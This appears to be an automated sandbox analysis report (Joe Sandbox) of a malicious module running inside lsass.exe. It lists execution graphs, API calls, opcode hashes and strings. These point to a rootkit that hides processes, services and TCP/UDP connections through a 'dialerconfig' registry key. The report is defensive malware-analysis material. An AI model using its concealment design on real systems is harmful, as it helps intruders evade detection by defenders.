                                                                    execution_graph 15137 2d6f151202c 15138 2d6f151205d 15137->15138 15139 2d6f151213e 15138->15139 15140 2d6f1512173 15138->15140 15146 2d6f1512081 15138->15146 15141 2d6f15121e7 15140->15141 15142 2d6f1512178 15140->15142 15141->15139 15145 2d6f1512f04 9 API calls 15141->15145 15155 2d6f1512f04 GetProcessHeap 15142->15155 15144 2d6f15120b9 StrCmpNIW 15144->15146 15145->15139 15146->15139 15146->15144 15148 2d6f1511bf4 15146->15148 15149 2d6f1511c1b GetProcessHeap 15148->15149 15150 2d6f1511c8f 15148->15150 15151 2d6f1511c41 __free_lconv_mon 15149->15151 15150->15146 15151->15150 15152 2d6f1511c77 GetProcessHeap HeapFree 15151->15152 15161 2d6f151152c 15151->15161 15152->15150 15160 2d6f1512f40 __free_lconv_mon 15155->15160 15156 2d6f1513015 GetProcessHeap HeapFree 15156->15139 15157 2d6f1513010 15157->15156 15158 2d6f1512fa2 StrCmpNIW 15158->15160 15159 2d6f1511bf4 5 API calls 15159->15160 15160->15156 15160->15157 15160->15158 15160->15159 15162 2d6f151157c 15161->15162 15165 2d6f1511546 15161->15165 15162->15152 15163 2d6f151155d StrCmpIW 15163->15165 15164 2d6f1511565 StrCmpW 15164->15165 15165->15162 15165->15163 15165->15164 15166 2d6f151253c 15167 2d6f15125bb 15166->15167 15168 2d6f151261d GetFileType 15167->15168 15180 2d6f15127aa 15167->15180 15169 2d6f151262b StrCpyW 15168->15169 15170 2d6f1512641 15168->15170 15171 2d6f1512650 15169->15171 15182 2d6f1511a40 GetFinalPathNameByHandleW 15170->15182 15174 2d6f15126ff 15171->15174 15176 2d6f151265a 15171->15176 15175 2d6f1513844 StrCmpNIW 15174->15175 15179 2d6f1513044 4 API calls 15174->15179 15174->15180 15181 2d6f1511cac 2 API calls 15174->15181 15175->15174 15176->15180 15187 2d6f1513844 15176->15187 15190 2d6f1513044 StrCmpIW 15176->15190 15194 2d6f1511cac 15176->15194 15179->15174 15181->15174 15183 2d6f1511aa9 15182->15183 15184 2d6f1511a6a StrCmpNIW 15182->15184 15183->15171 15184->15183 15185 2d6f1511a84 lstrlenW 15184->15185 15185->15183 15186 2d6f1511a96 StrCpyW 15185->15186 15186->15183 15188 2d6f1513866 15187->15188 15189 2d6f1513851 StrCmpNIW 15187->15189 15188->15176 15189->15188 15191 2d6f1513076 StrCpyW StrCatW 15190->15191 15192 2d6f151308d PathCombineW 15190->15192 15193 2d6f1513096 15191->15193 15192->15193 15193->15176 15195 2d6f1511cc3 15194->15195 15196 2d6f1511ccc 15194->15196 15197 2d6f151152c 2 API calls 15195->15197 15196->15176 15197->15196 15198 2d6f1511abc 15203 2d6f1511628 GetProcessHeap 15198->15203 15200 2d6f1511ad2 Sleep SleepEx 15202 2d6f1511acb 15200->15202 15201 2d6f1511598 StrCmpIW StrCmpW 15201->15202 15202->15200 15202->15201 15204 2d6f1511648 __free_lconv_mon 15203->15204 15248 2d6f1511268 GetProcessHeap 15204->15248 15206 2d6f1511650 15207 2d6f1511268 2 API calls 15206->15207 15208 2d6f1511661 15207->15208 15209 2d6f1511268 2 API calls 15208->15209 15210 2d6f151166a 15209->15210 15211 2d6f1511268 2 API calls 15210->15211 15212 2d6f1511673 15211->15212 15213 2d6f151168e RegOpenKeyExW 15212->15213 15214 2d6f15118a6 15213->15214 15215 2d6f15116c0 RegOpenKeyExW 15213->15215 15214->15202 15216 2d6f15116e9 15215->15216 15217 2d6f15116ff RegOpenKeyExW 15215->15217 15252 2d6f15112bc RegQueryInfoKeyW 15216->15252 15219 2d6f151173a RegOpenKeyExW 15217->15219 15220 2d6f1511723 15217->15220 15221 2d6f151175e 15219->15221 15222 2d6f1511775 RegOpenKeyExW 15219->15222 15263 2d6f151104c RegQueryInfoKeyW 15220->15263 15226 2d6f15112bc 13 API calls 15221->15226 15227 2d6f1511799 15222->15227 15228 2d6f15117b0 RegOpenKeyExW 15222->15228 15229 2d6f151176b RegCloseKey 15226->15229 15230 2d6f15112bc 13 API calls 15227->15230 15231 2d6f15117eb RegOpenKeyExW 15228->15231 15232 2d6f15117d4 15228->15232 15229->15222 15233 2d6f15117a6 RegCloseKey 15230->15233 15235 2d6f1511826 RegOpenKeyExW 15231->15235 15236 2d6f151180f 15231->15236 15234 2d6f15112bc 13 API calls 15232->15234 15233->15228 15239 2d6f15117e1 RegCloseKey 15234->15239 15237 2d6f151184a 15235->15237 15238 2d6f1511861 RegOpenKeyExW 15235->15238 15240 2d6f151104c 5 API calls 15236->15240 15242 2d6f151104c 5 API calls 15237->15242 15243 2d6f151189c RegCloseKey 15238->15243 15244 2d6f1511885 15238->15244 15239->15231 15241 2d6f151181c RegCloseKey 15240->15241 15241->15235 15245 2d6f1511857 RegCloseKey 15242->15245 15243->15214 15246 2d6f151104c 5 API calls 15244->15246 15245->15238 15247 2d6f1511892 RegCloseKey 15246->15247 15247->15243 15269 2d6f1526168 15248->15269 15250 2d6f1511283 GetProcessHeap 15251 2d6f15112ae __free_lconv_mon 15250->15251 15251->15206 15253 2d6f1511327 GetProcessHeap 15252->15253 15254 2d6f151148a RegCloseKey 15252->15254 15255 2d6f151133e __free_lconv_mon 15253->15255 15254->15217 15256 2d6f1511476 GetProcessHeap HeapFree 15255->15256 15257 2d6f1511352 RegEnumValueW 15255->15257 15258 2d6f151152c 2 API calls 15255->15258 15259 2d6f151141e lstrlenW GetProcessHeap 15255->15259 15260 2d6f15113d3 GetProcessHeap 15255->15260 15261 2d6f15113f3 GetProcessHeap HeapFree 15255->15261 15262 2d6f1511443 StrCpyW 15255->15262 15256->15254 15257->15255 15258->15255 15259->15255 15260->15255 15261->15259 15262->15255 15264 2d6f15111b5 RegCloseKey 15263->15264 15267 2d6f15110bf __free_lconv_mon 15263->15267 15264->15219 15265 2d6f15110cf RegEnumValueW 15265->15267 15266 2d6f151114e GetProcessHeap 15266->15267 15267->15264 15267->15265 15267->15266 15268 2d6f151116e GetProcessHeap HeapFree 15267->15268 15268->15267 15270 2d6f1526177 15269->15270 15270->15270 15271 2d6f14e273c 15273 2d6f14e276a 15271->15273 15272 2d6f14e2858 LoadLibraryA 15272->15273 15273->15272 15274 2d6f14e28d4 15273->15274

                                                                    Executed Functions

                                                                    Function 000002D6F151253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5 2d6f151253c-2d6f15125c0 call 2d6f1532cc0 8 2d6f15125c6-2d6f15125c9 5->8 9 2d6f15127d8-2d6f15127fb 5->9 8->9 10 2d6f15125cf-2d6f15125dd 8->10 10->9 11 2d6f15125e3-2d6f1512629 call 2d6f1518c60 * 3 GetFileType 10->11 18 2d6f151262b-2d6f151263f StrCpyW 11->18 19 2d6f1512641-2d6f151264b call 2d6f1511a40 11->19 20 2d6f1512650-2d6f1512654 18->20 19->20 22 2d6f151265a-2d6f1512673 call 2d6f15130a8 call 2d6f1513844 20->22 23 2d6f15126ff-2d6f1512704 20->23 36 2d6f15126aa-2d6f15126f4 call 2d6f1532cc0 22->36 37 2d6f1512675-2d6f15126a4 call 2d6f15130a8 call 2d6f1513044 call 2d6f1511cac 22->37 25 2d6f1512707-2d6f151270c 23->25 27 2d6f1512729 25->27 28 2d6f151270e-2d6f1512711 25->28 31 2d6f151272c-2d6f1512745 call 2d6f15130a8 call 2d6f1513844 27->31 28->27 30 2d6f1512713-2d6f1512716 28->30 30->27 33 2d6f1512718-2d6f151271b 30->33 46 2d6f1512787-2d6f1512789 31->46 47 2d6f1512747-2d6f1512776 call 2d6f15130a8 call 2d6f1513044 call 2d6f1511cac 31->47 33->27 38 2d6f151271d-2d6f1512720 33->38 36->9 48 2d6f15126fa 36->48 37->9 37->36 38->27 42 2d6f1512722-2d6f1512727 38->42 42->27 42->31 51 2d6f151278b-2d6f15127a5 46->51 52 2d6f15127aa-2d6f15127ad 46->52 47->46 69 2d6f1512778-2d6f1512783 47->69 48->22 51->25 56 2d6f15127b7-2d6f15127ba 52->56 57 2d6f15127af-2d6f15127b5 52->57 59 2d6f15127bc-2d6f15127bf 56->59 60 2d6f15127d5 56->60 57->9 59->60 62 2d6f15127c1-2d6f15127c4 59->62 60->9 62->60 64 2d6f15127c6-2d6f15127c9 62->64 64->60 66 2d6f15127cb-2d6f15127ce 64->66 66->60 68 2d6f15127d0-2d6f15127d3 66->68 68->9 68->60 69->9 70 2d6f1512785 69->70 70->25
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: fa04f75c9475a18510419c108b79fce0653dad0fa003f1e7f796e61fbc6322b7
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: A07170A6200F858AE6669F25B85C3AA6794F3857D4F64002BDD0F67F89DF39CE458700
                                                                    Function 000002D6F151202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 71 2d6f151202c-2d6f1512057 call 2d6f1532d00 73 2d6f151205d-2d6f1512066 71->73 74 2d6f1512068-2d6f151206c 73->74 75 2d6f151206f-2d6f1512072 73->75 74->75 76 2d6f1512078-2d6f151207b 75->76 77 2d6f1512223-2d6f1512243 75->77 78 2d6f1512081-2d6f1512093 76->78 79 2d6f1512173-2d6f1512176 76->79 78->77 82 2d6f1512099-2d6f15120a5 78->82 80 2d6f15121e7-2d6f15121ea 79->80 81 2d6f1512178-2d6f1512192 call 2d6f1512f04 79->81 80->77 86 2d6f15121ec-2d6f15121ff call 2d6f1512f04 80->86 81->77 91 2d6f1512198-2d6f15121ae 81->91 84 2d6f15120a7-2d6f15120b7 82->84 85 2d6f15120d3-2d6f15120de call 2d6f1511bbc 82->85 84->85 88 2d6f15120b9-2d6f15120d1 StrCmpNIW 84->88 92 2d6f15120ff-2d6f1512111 85->92 99 2d6f15120e0-2d6f15120f8 call 2d6f1511bf4 85->99 86->77 98 2d6f1512201-2d6f1512209 86->98 88->85 88->92 91->77 97 2d6f15121b0-2d6f15121cc 91->97 95 2d6f1512121-2d6f1512123 92->95 96 2d6f1512113-2d6f1512115 92->96 102 2d6f151212a 95->102 103 2d6f1512125-2d6f1512128 95->103 100 2d6f1512117-2d6f151211a 96->100 101 2d6f151211c-2d6f151211f 96->101 104 2d6f15121d0-2d6f15121e3 97->104 98->77 105 2d6f151220b-2d6f1512213 98->105 99->92 111 2d6f15120fa-2d6f15120fd 99->111 108 2d6f151212d-2d6f1512130 100->108 101->108 102->108 103->108 104->104 109 2d6f15121e5 104->109 110 2d6f1512216-2d6f1512221 105->110 112 2d6f151213e-2d6f1512141 108->112 113 2d6f1512132-2d6f1512138 108->113 109->77 110->77 110->110 111->108 112->77 114 2d6f1512147-2d6f151214b 112->114 113->82 113->112 115 2d6f151214d-2d6f1512150 114->115 116 2d6f1512162-2d6f151216e 114->116 115->77 117 2d6f1512156-2d6f151215b 115->117 116->77 117->114 118 2d6f151215d 117->118 118->77
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: S$dialer
                                                                    • API String ID: 756756679-3873981283
                                                                    • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                    • Instruction ID: 7a83d85bf80e11694d2d7db4162bf47d6d0c4d20143003a03d639ac9e943c438
                                                                    • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                    • Instruction Fuzzy Hash: 6D518BB6A10E248AEB62CF26F84C6AD63A5F7047C4F25951ADE1E22E85DB39CC51C740
                                                                    Function 000002D6F1511A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: 1a29fbed29bbccc1987992930e6102033b0a423cd1e4e3151e2afb20eff6506f
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: 14F03CA3304A8196EB608F21F8DC75967A0F758BC8F944022DA4E46D58DB7CCE8DCB00
                                                                    Function 000002D6F151328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 25535357102f4341e1be78c6643d6b7c1b19e4a9101efaa7cc3453e24cb777c9
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: 7811C0F1610E808EFBA2AF61F86D75922A4A7543E4F40412B990F92E90EF7CCC48C204
                                                                    Function 000002D6F1511ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 000002D6F1511628: GetProcessHeap.KERNEL32 ref: 000002D6F1511633
                                                                      • Part of subcall function 000002D6F1511628: HeapAlloc.KERNEL32 ref: 000002D6F1511642
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116B2
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116DF
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15116F9
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511719
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511734
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511754
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151176F
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151178F
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117AA
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15117CA
                                                                    • Sleep.KERNEL32 ref: 000002D6F1511AD7
                                                                    • SleepEx.KERNELBASE ref: 000002D6F1511ADD
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117E5
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511805
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511820
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511840
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151185B
                                                                      • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151187B
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511896
                                                                      • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15118A0
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: fabcacca4273e522b4c4af737a3624ee53845b919a9d6f50b07f832e41c12ee0
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: 4A31BDE1210E4599EF529F36F6CD3A923A5BB44BD0F0854679E0FA7E95EE1CCC51C210
                                                                    Function 000002D6F14E273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 176 2d6f14e273c-2d6f14e27a4 call 2d6f14e29d4 * 4 185 2d6f14e29b2 176->185 186 2d6f14e27aa-2d6f14e27ad 176->186 187 2d6f14e29b4-2d6f14e29d0 185->187 186->185 188 2d6f14e27b3-2d6f14e27b6 186->188 188->185 189 2d6f14e27bc-2d6f14e27bf 188->189 189->185 190 2d6f14e27c5-2d6f14e27e6 189->190 190->185 192 2d6f14e27ec-2d6f14e280c 190->192 193 2d6f14e280e-2d6f14e2836 192->193 194 2d6f14e2838-2d6f14e283f 192->194 193->193 193->194 195 2d6f14e2845-2d6f14e2852 194->195 196 2d6f14e28df-2d6f14e28e6 194->196 195->196 199 2d6f14e2858-2d6f14e286a LoadLibraryA 195->199 197 2d6f14e2992-2d6f14e29b0 196->197 198 2d6f14e28ec-2d6f14e2901 196->198 197->187 198->197 200 2d6f14e2907 198->200 201 2d6f14e286c-2d6f14e2878 199->201 202 2d6f14e28ca-2d6f14e28d2 199->202 205 2d6f14e290d-2d6f14e2921 200->205 206 2d6f14e28c5-2d6f14e28c8 201->206 202->199 203 2d6f14e28d4-2d6f14e28d9 202->203 203->196 208 2d6f14e2982-2d6f14e298c 205->208 209 2d6f14e2923-2d6f14e2934 205->209 206->202 207 2d6f14e287a-2d6f14e287d 206->207 213 2d6f14e287f-2d6f14e28a5 207->213 214 2d6f14e28a7-2d6f14e28b7 207->214 208->197 208->205 211 2d6f14e293f-2d6f14e2943 209->211 212 2d6f14e2936-2d6f14e293d 209->212 216 2d6f14e2945-2d6f14e294b 211->216 217 2d6f14e294d-2d6f14e2951 211->217 215 2d6f14e2970-2d6f14e2980 212->215 218 2d6f14e28ba-2d6f14e28c1 213->218 214->218 215->208 215->209 216->215 219 2d6f14e2963-2d6f14e2967 217->219 220 2d6f14e2953-2d6f14e2961 217->220 218->206 219->215 222 2d6f14e2969-2d6f14e296c 219->222 220->215 222->215
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: 2a527126fa6660018da58d358d37c763bfb819c27c69be159df49911753554d9
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: BB61D472B01A908BDB54CF15A44CB2D7392FB94BE4F58912ADE5A07B8CDA3CDD52C700

                                                                    Non-executed Functions

                                                                    Function 000002D6F1512B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 482 2d6f1512b2c-2d6f1512ba5 call 2d6f1532ce0 485 2d6f1512bab-2d6f1512bb1 482->485 486 2d6f1512ee0-2d6f1512f03 482->486 485->486 487 2d6f1512bb7-2d6f1512bba 485->487 487->486 488 2d6f1512bc0-2d6f1512bc3 487->488 488->486 489 2d6f1512bc9-2d6f1512bd9 GetModuleHandleA 488->489 490 2d6f1512bdb-2d6f1512beb call 2d6f1526090 489->490 491 2d6f1512bed 489->491 493 2d6f1512bf0-2d6f1512c0e 490->493 491->493 493->486 496 2d6f1512c14-2d6f1512c33 StrCmpNIW 493->496 496->486 497 2d6f1512c39-2d6f1512c3d 496->497 497->486 498 2d6f1512c43-2d6f1512c4d 497->498 498->486 499 2d6f1512c53-2d6f1512c5a 498->499 499->486 500 2d6f1512c60-2d6f1512c73 499->500 501 2d6f1512c83 500->501 502 2d6f1512c75-2d6f1512c81 500->502 503 2d6f1512c86-2d6f1512c8a 501->503 502->503 504 2d6f1512c9a 503->504 505 2d6f1512c8c-2d6f1512c98 503->505 506 2d6f1512c9d-2d6f1512ca7 504->506 505->506 507 2d6f1512d9d-2d6f1512da1 506->507 508 2d6f1512cad-2d6f1512cb0 506->508 509 2d6f1512da7-2d6f1512daa 507->509 510 2d6f1512ed2-2d6f1512eda 507->510 511 2d6f1512cc2-2d6f1512ccc 508->511 512 2d6f1512cb2-2d6f1512cbf call 2d6f151199c 508->512 513 2d6f1512dbb-2d6f1512dc5 509->513 514 2d6f1512dac-2d6f1512db8 call 2d6f151199c 509->514 510->486 510->500 516 2d6f1512cce-2d6f1512cdb 511->516 517 2d6f1512d00-2d6f1512d0a 511->517 512->511 521 2d6f1512dc7-2d6f1512dd4 513->521 522 2d6f1512df5-2d6f1512df8 513->522 514->513 516->517 524 2d6f1512cdd-2d6f1512cea 516->524 518 2d6f1512d3a-2d6f1512d3d 517->518 519 2d6f1512d0c-2d6f1512d19 517->519 526 2d6f1512d4b-2d6f1512d58 lstrlenW 518->526 527 2d6f1512d3f-2d6f1512d49 call 2d6f1511bbc 518->527 519->518 525 2d6f1512d1b-2d6f1512d28 519->525 521->522 529 2d6f1512dd6-2d6f1512de3 521->529 530 2d6f1512dfa-2d6f1512e03 call 2d6f1511bbc 522->530 531 2d6f1512e05-2d6f1512e12 lstrlenW 522->531 532 2d6f1512ced-2d6f1512cf3 524->532 535 2d6f1512d2b-2d6f1512d31 525->535 537 2d6f1512d7b-2d6f1512d8d call 2d6f1513844 526->537 538 2d6f1512d5a-2d6f1512d64 526->538 527->526 542 2d6f1512d93-2d6f1512d98 527->542 539 2d6f1512de6-2d6f1512dec 529->539 530->531 549 2d6f1512e4a-2d6f1512e55 530->549 533 2d6f1512e35-2d6f1512e3f call 2d6f1513844 531->533 534 2d6f1512e14-2d6f1512e1e 531->534 541 2d6f1512cf9-2d6f1512cfe 532->541 532->542 544 2d6f1512e42-2d6f1512e44 533->544 534->533 543 2d6f1512e20-2d6f1512e33 call 2d6f151152c 534->543 535->542 545 2d6f1512d33-2d6f1512d38 535->545 537->542 537->544 538->537 548 2d6f1512d66-2d6f1512d79 call 2d6f151152c 538->548 539->549 550 2d6f1512dee-2d6f1512df3 539->550 541->517 541->532 542->544 543->533 543->549 544->510 544->549 545->518 545->535 548->537 548->542 556 2d6f1512e57-2d6f1512e5b 549->556 557 2d6f1512ecc-2d6f1512ed0 549->557 550->522 550->539 560 2d6f1512e5d-2d6f1512e61 556->560 561 2d6f1512e63-2d6f1512e7d call 2d6f15185c0 556->561 557->510 560->561 563 2d6f1512e80-2d6f1512e83 560->563 561->563 565 2d6f1512ea6-2d6f1512ea9 563->565 566 2d6f1512e85-2d6f1512ea3 call 2d6f15185c0 563->566 565->557 569 2d6f1512eab-2d6f1512ec9 call 2d6f15185c0 565->569 566->565 569->557
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: e52bf68b31deb3b75f098f43a4d7db34dffa5d04e032c03eec0775e701bb4258
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: B0B17CA2210E908EEB668F25E44C7A963A5F744BD4F64511BEE0E67F94DF38CC81C740
                                                                    Function 000002D6F1517D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 2c2ab99ae258e3bf0c478ecf6a228b1e325b8175137ff9dca730b23599cdb4cd
                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: 97311AB2205E808AEB609F64F8887ED7364F785788F44442ADA4E57B95EF38CA48C710
                                                                    Function 000002D6F151D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: 58eb25c51ad3c38e9823b02ddc7af6a39282a3411e5fadb664d5dd80ce479239
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: BB315D76214F808AEB60CF25F88839E73A4F789794F500126EA9E57B99DF3CC945CB00
                                                                    Function 000002D6F1511628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
